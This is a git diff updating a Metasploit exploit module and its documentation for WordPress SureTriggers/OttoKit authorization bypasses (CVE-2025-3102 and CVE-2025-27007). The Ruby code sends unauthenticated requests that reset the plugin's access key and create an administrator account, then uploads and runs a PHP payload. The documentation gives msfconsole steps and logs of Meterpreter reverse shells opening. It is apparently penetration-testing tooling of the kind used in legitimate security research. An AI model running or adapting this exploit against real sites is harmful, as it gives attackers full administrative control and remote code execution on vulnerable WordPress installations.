diff --git a/documentation/modules/exploit/multi/http/wp_suretriggers_auth_bypass.md b/documentation/modules/exploit/multi/http/wp_suretriggers_auth_bypass.md index da26266937f8..4f011b53acc7 100644 --- a/documentation/modules/exploit/multi/http/wp_suretriggers_auth_bypass.md +++ b/documentation/modules/exploit/multi/http/wp_suretriggers_auth_bypass.md @@ -1,17 +1,28 @@ ## Vulnerable Application -This Metasploit module exploits an administrative user creation vulnerability in the -WordPress SureTriggers plugin, versions <= 1.0.78 (CVE-2025-3102). -The plugin exposes an unauthenticated REST endpoint (`automation/action`) that allows -bypassing permission checks to create a new administrator account. +This Metasploit module exploits administrative user creation vulnerabilities in the +WordPress SureTriggers/OttoKit plugin: -To replicate a vulnerable environment for testing: +* **CVE-2025-3102** (≤ 1.0.78): unauthenticated admin creation via the `automation/action` +REST endpoint with an empty `St-Authorization: Bearer ` header. +* **CVE-2025-27007** (≤ 1.0.82): unauthenticated reset of the access key via the `connection/create-wp-connection` endpoint, +followed by admin creation using `St-Authorization: Bearer `. -1. Install WordPress using the provided Docker Compose configuration. -2. Download and install the SureTriggers plugin v1.0.78: - [https://downloads.wordpress.org/plugin/suretriggers.1.0.78.zip](https://downloads.wordpress.org/plugin/suretriggers.1.0.78.zip) -3. Verify that the plugin is activated and accessible on the local network. -4. No further configuration is required; vulnerability is present immediately upon activation. +### To replicate vulnerable environments + +1. **SureTriggers v1.0.78 (CVE-2025-3102)** + + * Download & install plugin v1.0.78: + `https://downloads.wordpress.org/plugin/suretriggers.1.0.78.zip` + * No additional setup is required; the bypass works immediately upon activation. + +2. **SureTriggers v1.0.82 (CVE-2025-27007)** + + * Download & install plugin v1.0.82: + `https://downloads.wordpress.org/plugin/suretriggers.1.0.82.zip` + * No secret key is needed; the exploit will reset it to the specified value. + +Both scenarios can be deployed via Docker Compose. ## Docker Compose Configuration @@ -62,131 +73,168 @@ post_max_size = 64M ```bash docker-compose up -d ``` - -2. Complete WordPress setup at [http://localhost:5555](http://localhost:5555) -3. Confirm that SureTriggers v1.0.78 is active under **Plugins** -4. Launch `msfconsole` -5. Load the module: +2. Complete WordPress setup at [http://localhost:5555](http://localhost:5555). +3. Confirm the targeted SureTriggers version is active under **Plugins**. +4. In `msfconsole`: ```bash use exploit/multi/http/wp_suretriggers_auth_bypass -``` - -6. Set `RHOSTS` to the target IP -7. Optionally set `ST_AUTH` if you have an existing key -8. Configure `WP_USER`, `WP_PASS`, `WP_EMAIL` -9. Execute the exploit with `run` - -## Options - -* **RHOSTS**: Target IP address or hostname where WordPress is running. -* **TARGETURI**: Base path to the WordPress installation (default is `/`). -* **WP_USER**, **WP_PASS**, **WP_EMAIL**: Credentials for the new administrator account that the exploit will create. - By default these are randomly generated but you can set them to values of your choice, for example: - -```bash +set RHOSTS 127.0.0.1 +set TARGETURI / set WP_USER eviladmin set WP_PASS Str0ngP@ss! set WP_EMAIL eviladmin@example.com ``` -* **ST_AUTH**: *(Optional)* If you have the plugin’s secret key (used in the `st_authorization` header), - you can provide it here to authenticate the REST request. - If left empty the module will send an empty header value, which still works on versions <= 1.0.78. - -## Scenarios +## Options -### Successful Exploitation Against SureTriggers v1.0.78 +* **WP_USER**, **WP_PASS**, **WP_EMAIL**: New administrator credentials (random by default). +* **ST_AUTH**: *(Optional)* Value for `St-Authorization` header (used by CVE-2025-3102; default empty). +* **ACCESS_KEY**: *(Optional)* Key to reset for CVE-2025-27007 (random by default). +* **ACTION**: Exploit to perform: -**Setup:** + * `CVE-2025-3102` + * `CVE-2025-27007` -* Local WordPress instance with SureTriggers v1.0.78 -* Metasploit Framework +## Scenarios -**Steps:** +### CVE-2025-3102: Empty Bearer Admin Creation -1. Start `msfconsole` +1. Ensure SureTriggers v1.0.78 is active. +2. In `msfconsole`, set: -2. Load the module: ```bash -use exploit/multi/http/wp_suretriggers_auth_bypass +set ACTION CVE-2025-3102 ``` -3. Configure: +3. Run the module: it will send an empty `St-Authorization: Bearer ` header to `/wp-json/sure-triggers/v1/automation/action`. +4. New administrator is created; payload is uploaded and executed. + +### CVE-2025-27007: Reset Access Key & Admin Creation + +1. Ensure SureTriggers v1.0.82 is active. +2. In `msfconsole`, set: + ```bash -set RHOSTS 127.0.0.1 -set TARGETURI / -set WP_USER eviladmin -set WP_PASS Str0ngP@ss! -run +set ACTION CVE-2025-27007 ``` +3. Run the module: it will call `/wp-json/sure-triggers/v1/connection/create-wp-connection` to reset the key, then use + `St-Authorization: Bearer mynewkey123` against `/wp-json/sure-triggers/v1/automation/action`. +4. New administrator is created; payload is uploaded and executed. -**Expected Results**: + +### Expected Results (CVE-2025-3102) With `php/meterpreter/reverse_tcp`: ```plaintext -msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > run http://127.0.0.1:5555 +msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > run http://lab:5555 [*] Started reverse TCP handler on 192.168.1.36:4444 [*] Running automatic check ("set AutoCheck false" to disable) -[*] Detected WordPress version: 6.3.2 -[+] Detected suretriggers plugin version: 1.0.78 -[+] The target appears to be vulnerable. -[*] Attempting to create administrator user via auth bypass... -[!] Primary endpoint failed or did not return success, trying fallback via rest_route... -[+] Administrator created: sol_bash:k9R0ZwjRX5VBOBJ +[*] Detected WordPress version: 6.8.1 +[+] The target appears to be vulnerable. Detected suretriggers version 1.0.78 (vulnerable to CVE-2025-3102) +[*] CVE-2025-3102: creating admin via St-Authorization Bearer (empty) +[+] Admin created: zGrsYO:8XL0pZKjN7pc [*] Uploading malicious plugin for code execution... -[*] Executing payload at /wp-content/plugins/wp_p2ash/ajax_efdsa.php... -[*] Sending stage (40004 bytes) to 172.27.0.2 -[+] Deleted ajax_efdsa.php -[+] Deleted wp_p2ash.php -[+] Deleted ../wp_p2ash -[*] Meterpreter session 3 opened (192.168.1.36:4444 -> 172.27.0.2:33924) at 2025-05-07 17:22:49 +0200 +[*] Executing payload at /wp-content/plugins/wp_63rkh/ajax_fybgc.php... +[*] Sending stage (40004 bytes) to 172.27.0.3 +[+] Deleted ajax_fybgc.php +[+] Deleted wp_63rkh.php +[+] Deleted ../wp_63rkh +[*] Meterpreter session 1 opened (192.168.1.36:4444 -> 172.27.0.3:51410) at 2025-05-14 19:00:30 +0200 meterpreter > sysinfo -Computer : a6e792b1c252 -OS : Linux a6e792b1c252 6.14.2-2-cachyos #1 SMP PREEMPT_DYNAMIC Thu, 10 Apr 2025 17:27:10 +0000 x86_64 +Computer : 396e678f2510 +OS : Linux 396e678f2510 6.14.2-2-cachyos #1 SMP PREEMPT_DYNAMIC Thu, 10 Apr 2025 17:27:10 +0000 x86_64 Meterpreter : php/linux ``` With `cmd/linux/http/x64/meterpreter/reverse_tcp`: ```plaintext -msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > show targets +msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > set target 1 +target => 1 +msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp +payload => cmd/linux/http/x64/meterpreter/reverse_tcp +msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > run http://lab:5555 +[*] Started reverse TCP handler on 192.168.1.36:4444 +[*] Running automatic check ("set AutoCheck false" to disable) +[*] Detected WordPress version: 6.8.1 +[+] The target appears to be vulnerable. Detected suretriggers version 1.0.78 (vulnerable to CVE-2025-3102) +[*] CVE-2025-3102: creating admin via St-Authorization Bearer (empty) +[+] Admin created: zGrsYO:8XL0pZKjN7pc +[*] Uploading malicious plugin for code execution... +[*] Executing payload at /wp-content/plugins/wp_exf15/ajax_tpfd9.php... +[*] Sending stage (3045380 bytes) to 172.27.0.3 +[+] Deleted ajax_tpfd9.php +[+] Deleted wp_exf15.php +[+] Deleted ../wp_exf15 +[*] Meterpreter session 2 opened (192.168.1.36:4444 -> 172.27.0.3:53324) at 2025-05-14 19:02:06 +0200 + +meterpreter > sysinfo +Computer : 172.27.0.3 +OS : Debian 12.10 (Linux 6.14.2-2-cachyos) +Architecture : x64 +BuildTuple : x86_64-linux-musl +Meterpreter : x64/linux +``` -Exploit targets: -================= +### Expected Results (CVE-2025-27007) - Id Name - -- ---- -=> 0 PHP In-Memory - 1 Unix In-Memory - 2 Windows In-Memory +With `php/meterpreter/reverse_tcp`: +```plaintext +msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > set action CVE-2025-27007 +action => CVE-2025-27007 +msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > run http://lab:5555 +[*] Started reverse TCP handler on 192.168.1.36:4444 +[*] Running automatic check ("set AutoCheck false" to disable) +[*] Detected WordPress version: 6.8.1 +[+] The target appears to be vulnerable. Detected suretriggers version 1.0.82 (vulnerable to CVE-2025-27007) +[*] CVE-2025-27007: reset access key & create admin +[*] Resetting access key +[+] Access key reset successful +[+] Admin created: pAEaR3:98TCYzILsdXt +[*] Uploading malicious plugin for code execution... +[*] Executing payload at /wp-content/plugins/wp_14slj/ajax_drh8b.php... +[*] Sending stage (40004 bytes) to 172.27.0.3 +[+] Deleted ajax_drh8b.php +[+] Deleted wp_14slj.php +[+] Deleted ../wp_14slj +[*] Meterpreter session 1 opened (192.168.1.36:4444 -> 172.27.0.3:42464) at 2025-05-14 19:05:06 +0200 +meterpreter > sysinfo +Computer : 396e678f2510 +OS : Linux 396e678f2510 6.14.2-2-cachyos #1 SMP PREEMPT_DYNAMIC Thu, 10 Apr 2025 17:27:10 +0000 x86_64 +Meterpreter : php/linux +``` + +With `cmd/linux/http/x64/meterpreter/reverse_tcp`: + +```plaintext msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > set target 1 target => 1 msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp payload => cmd/linux/http/x64/meterpreter/reverse_tcp -msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > run http://127.0.0.1:5555 +msf6 exploit(multi/http/wp_suretriggers_auth_bypass) > run http://lab:5555 [*] Started reverse TCP handler on 192.168.1.36:4444 [*] Running automatic check ("set AutoCheck false" to disable) -[*] Detected WordPress version: 6.3.2 -[+] Detected suretriggers plugin version: 1.0.78 -[+] The target appears to be vulnerable. -[*] Attempting to create administrator user via auth bypass... -[!] Primary endpoint failed or did not return success, trying fallback via rest_route... -[+] Administrator created: sol_bash:k9R0ZwjRX5VBOBJ +[*] Detected WordPress version: 6.8.1 +[+] The target appears to be vulnerable. Detected suretriggers version 1.0.82 (vulnerable to CVE-2025-27007) +[*] CVE-2025-27007: reset access key & create admin +[*] Resetting access key +[+] Access key reset successful +[+] Admin created: pAEaR3:98TCYzILsdXt [*] Uploading malicious plugin for code execution... -[*] Executing payload at /wp-content/plugins/wp_ppqii/ajax_cqc8l.php... -[*] Sending stage (3045380 bytes) to 172.27.0.2 -[+] Deleted ajax_cqc8l.php -[+] Deleted wp_ppqii.php -[+] Deleted ../wp_ppqii -[*] Meterpreter session 4 opened (192.168.1.36:4444 -> 172.27.0.2:54238) at 2025-05-07 17:24:10 +0200 +[*] Executing payload at /wp-content/plugins/wp_c7ziw/ajax_a9arm.php... +[*] Sending stage (3045380 bytes) to 172.27.0.3 +[+] Deleted ajax_a9arm.php +[+] Deleted wp_c7ziw.php +[+] Deleted ../wp_c7ziw +[*] Meterpreter session 2 opened (192.168.1.36:4444 -> 172.27.0.3:54362) at 2025-05-14 19:06:04 +0200 meterpreter > sysinfo -Computer : 172.27.0.2 -OS : Debian 11.8 (Linux 6.14.2-2-cachyos) +Computer : 172.27.0.3 +OS : Debian 12.10 (Linux 6.14.2-2-cachyos) Architecture : x64 BuildTuple : x86_64-linux-musl Meterpreter : x64/linux diff --git a/modules/exploits/multi/http/wp_suretriggers_auth_bypass.rb b/modules/exploits/multi/http/wp_suretriggers_auth_bypass.rb index ace3519847f8..af4f4c6d51ae 100644 --- a/modules/exploits/multi/http/wp_suretriggers_auth_bypass.rb +++ b/modules/exploits/multi/http/wp_suretriggers_auth_bypass.rb @@ -17,21 +17,25 @@ def initialize(info = {}) super( update_info( info, - 'Name' => 'WordPress SureTriggers Auth Bypass and RCE', + 'Name' => 'WordPress SureTriggers/OttoKit Combined Auth Bypass (CVE-2025-3102, CVE-2025-27007)', 'Description' => %q{ - This module exploits an authorization bypass in the WordPress SureTriggers plugin (<= 1.0.78). - It first creates a new administrator account via the unauthenticated REST endpoint, - then uploads and executes a PHP payload using FileDropper for remote code execution. + Exploits two distinct authorization bypasses in SureTriggers/OttoKit plugin: + - CVE-2025-3102: admin creation via St-Authorization Bearer (empty) + - CVE-2025-27007: reset access key via connection endpoint & admin creation with Bearer header }, 'Author' => [ - 'Michael Mazzolini (mikemyers)', # Vulnerability Discovery - 'Khaled Alenazi (Nxploited)', # PoC - 'Valentin Lobstein' # Metasploit module + 'Michael Mazzolini (mikemyers)', # Vulnerability discovery (CVE-2025-3102) + 'Denver Jackson', # Vulnerability discovery (CVE-2025-27007) + 'Khaled Alenazi (Nxploited)', # PoC (CVE-2025-3102) + 'Valentin Lobstein', # Metasploit module ], 'References' => [ ['CVE', '2025-3102'], + ['CVE', '2025-27007'], ['URL', 'https://github.com/Nxploited/CVE-2025-3102'], - ['URL', 'https://www.wordfence.com/blog/2025/04/100000-wordpress-sites-affected-by-administrative-user-creation-vulnerability-in-suretriggers-wordpress-plugin/'] + ['URL', 'https://www.wordfence.com/blog/2025/04/100000-wordpress-sites-affected-by-administrative-user-creation-vulnerability-in-suretriggers-wordpress-plugin/'], + ['URL', 'https://patchstack.com/articles/additional-critical-ottokit-formerly-suretriggers-vulnerability-patched?_s_id=cve'], + ['URL', 'https://cloud.projectdiscovery.io/library/CVE-2025-27007'] ], 'License' => MSF_LICENSE, 'Privileged' => false, @@ -70,14 +74,15 @@ def initialize(info = {}) 'Reliability' => [REPEATABLE_SESSION] } ) - ) + ) register_options( [ OptString.new('WP_USER', [true, 'Username for the new administrator', Faker::Internet.username(specifier: 5..8)]), OptString.new('WP_PASS', [true, 'Password for the new administrator', Faker::Internet.password(min_length: 12)]), OptString.new('WP_EMAIL', [true, 'Email for the new administrator', Faker::Internet.email(name: Faker::Internet.username(specifier: 5..8))]), - OptString.new('ST_AUTH', [false, 'Value for st_authorization header', '']) + OptString.new('ST_AUTH', [false, 'St-Authorization header', Rex::Text.rand_text_alphanumeric(16)]), + OptString.new('ACTION', [true, 'Action to perform (CVE-2025-3102 or CVE-2025-27007)', 'CVE-2025-3102']), ] ) end @@ -89,54 +94,146 @@ def check print_status("Detected WordPress version: #{wp_version}") if wp_version plugin = 'suretriggers' - readme = check_plugin_version_from_readme(plugin, '1.0.79', '0.0.1') - detected = readme&.details&.dig(:version) - - if detected.nil? + readme = check_plugin_version_from_readme(plugin, '1.0.82') + version = readme&.details&.dig(:version) + unless version return CheckCode::Unknown("Unable to determine the #{plugin} plugin version.") end - detected_version = Rex::Version.new(detected) - - if detected_version <= Rex::Version.new('1.0.78') - return CheckCode::Appears("Detected #{plugin} version #{detected_version}") + detected = Rex::Version.new(version) + if detected <= Rex::Version.new('1.0.78') + return CheckCode::Appears("Detected #{plugin} version #{detected} (vulnerable to CVE-2025-3102)") + elsif detected <= Rex::Version.new('1.0.82') + return CheckCode::Appears("Detected #{plugin} version #{detected} (vulnerable to CVE-2025-27007)") + else + return CheckCode::Safe("Detected #{plugin} version #{detected} (appears patched)") end - - CheckCode::Safe("#{plugin} #{detected_version} >= 1.0.79 appears patched") end def exploit - print_status('Attempting to create administrator user via auth bypass...') + action = datastore['ACTION'].to_s.upcase + case action + when 'CVE-2025-3102' + exploit_cve3102 + when 'CVE-2025-27007' + exploit_cve27007 + else + fail_with(Failure::BadConfig, "Unknown action: #{datastore['ACTION']}") + end + end - create_uri = normalize_uri(target_uri.path, 'wp-json', 'sure-triggers', 'v1', 'automation', 'action') - headers = { 'st_authorization' => datastore['ST_AUTH'] } - payload = user_payload.to_json + def exploit_cve3102 + print_status('CVE-2025-3102: creating admin via St-Authorization Bearer (empty)') + uri = normalize_uri(target_uri.path, 'wp-json', 'sure-triggers', 'v1', 'automation', 'action') + headers = { 'St-Authorization' => 'Bearer ' } res = send_request_cgi( 'method' => 'POST', - 'uri' => create_uri, + 'uri' => uri, 'ctype' => 'application/json', - 'data' => payload, + 'data' => user_payload.to_json, 'headers' => headers ) + unless res&.code == 200 && res.get_json_document&.dig('success') + vprint_warning('Primary endpoint failed, trying fallback via rest_route...') + res = send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path), + 'vars_get' => { 'rest_route' => '/sure-triggers/v1/automation/action' }, + 'ctype' => 'application/json', + 'data' => user_payload.to_json, + 'headers' => headers + ) + end + fail_with(Failure::UnexpectedReply, 'CVE-2025-3102: user creation failed') unless res&.code == 200 && res.get_json_document&.dig('success') + + finalize_admin + cookie = wordpress_login(datastore['WP_USER'], datastore['WP_PASS']) + upload_and_execute_payload(cookie) + end + + def exploit_cve27007 + print_status('CVE-2025-27007: reset access key & create admin') + reset_access_key + + uri = normalize_uri(target_uri.path, 'wp-json', 'sure-triggers', 'v1', 'automation', 'action') + headers = { 'St-Authorization' => "Bearer #{datastore['ST_AUTH']}" } + res = send_request_cgi( + 'method' => 'POST', + 'uri' => uri, + 'ctype' => 'application/json', + 'data' => user_payload.to_json, + 'headers' => headers + ) unless res&.code == 200 && res.get_json_document&.dig('success') - print_warning('Primary endpoint failed, trying fallback via rest_route...') + vprint_warning('Primary endpoint failed, trying fallback via rest_route...') res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path), 'vars_get' => { 'rest_route' => '/sure-triggers/v1/automation/action' }, 'ctype' => 'application/json', - 'data' => payload, + 'data' => user_payload.to_json, 'headers' => headers ) end + fail_with(Failure::UnexpectedReply, 'CVE-2025-27007: user creation failed') unless res&.code == 200 && res.get_json_document&.dig('success') + finalize_admin + cookie = wordpress_login(datastore['WP_USER'], datastore['WP_PASS']) + upload_and_execute_payload(cookie) + end + + def reset_access_key + print_status('Resetting access key') + uri = normalize_uri(target_uri.path, 'wp-json', 'sure-triggers', 'v1', 'connection', 'create-wp-connection') + body = { + 'sure-triggers-access-key' => datastore['ST_AUTH'], + 'wp-password' => datastore['WP_PASS'], + 'connection_status' => 'ok', + 'wp-username' => datastore['WP_USER'], + 'connected_email' => datastore['WP_EMAIL'] + }.to_json + + res = send_request_cgi( + 'method' => 'POST', + 'uri' => uri, + 'ctype' => 'application/json', + 'data' => body, + 'headers' => { 'User-Agent' => 'OttoKit' } + ) unless res&.code == 200 && res.get_json_document&.dig('success') - fail_with(Failure::UnexpectedReply, 'User creation did not return success') + vprint_warning('Primary endpoint failed, trying fallback via rest_route...') + res = send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path), + 'vars_get' => { 'rest_route' => '/sure-triggers/v1/connection/create-wp-connection' }, + 'ctype' => 'application/json', + 'data' => body, + 'headers' => { 'User-Agent' => 'OttoKit' } + ) end + fail_with(Failure::UnexpectedReply, 'Key reset failed') unless res&.code == 200 && res.get_json_document&.dig('success') + print_good('Access key reset successful') + end + + def user_payload + { + 'integration' => 'WordPress', + 'type_event' => 'create_user_if_not_exists', + 'selected_options' => { + 'user_name' => datastore['WP_USER'], + 'password' => datastore['WP_PASS'], + 'user_email' => datastore['WP_EMAIL'], + 'role' => 'administrator' + }, + 'fields' => [], + 'context' => {} + } + end - print_good("Administrator created: #{datastore['WP_USER']}:#{datastore['WP_PASS']}") + def finalize_admin + print_good("Admin created: #{datastore['WP_USER']}:#{datastore['WP_PASS']}") create_credential( workspace_id: myworkspace_id, @@ -151,7 +248,6 @@ def exploit protocol: 'tcp', status: Metasploit::Model::Login::Status::UNTRIED ) - vprint_good("Credential for user '#{datastore['WP_USER']}' stored successfully.") loot_data = "Username: #{datastore['WP_USER']}, Password: #{datastore['WP_PASS']}\n" @@ -179,28 +275,10 @@ def exploit host: datastore['RHOST'], port: datastore['RPORT'], proto: 'tcp', - name: 'SureTriggers WordPress Plugin Auth Bypass', + name: 'SureTriggers Auth Bypass', refs: references, - info: 'Unauthenticated admin creation via vulnerable REST API endpoint' + info: 'Unauthenticated admin creation via SureTriggers plugin' ) - - cookie = wordpress_login(datastore['WP_USER'], datastore['WP_PASS']) - upload_and_execute_payload(cookie) - end - - def user_payload - { - 'integration' => 'WordPress', - 'type_event' => 'create_user_if_not_exists', - 'selected_options' => { - 'user_name' => datastore['WP_USER'], - 'password' => datastore['WP_PASS'], - 'user_email' => datastore['WP_EMAIL'], - 'role' => 'administrator' - }, - 'fields' => [], - 'context' => {} - } end def upload_and_execute_payload(auth_cookie)